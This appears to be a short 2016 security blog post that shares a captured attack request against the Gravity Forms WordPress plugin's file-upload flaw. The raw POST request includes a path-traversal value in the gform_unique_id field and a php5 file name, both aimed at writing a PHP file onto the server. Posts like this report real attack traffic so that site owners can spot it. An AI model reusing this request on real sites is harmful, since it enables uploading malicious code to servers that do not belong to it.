Monday, August 29, 2016

Wordpress Gravity Forms File Upload Attempt

Here is a sample from this weekend of last year's Gravity Forms Wordpress file upload exploit

POST/?gf_page=upload HTTP/1.1
Host: mysite.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Length: 2476
Content-Type: multipart/form-data; boundary=3196e7ebf0e84b8499c31b44f2f68dd8
gform_unique_id=../../../../
name=css.php5
form_id=1
field_id=3
file=11.jpg

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)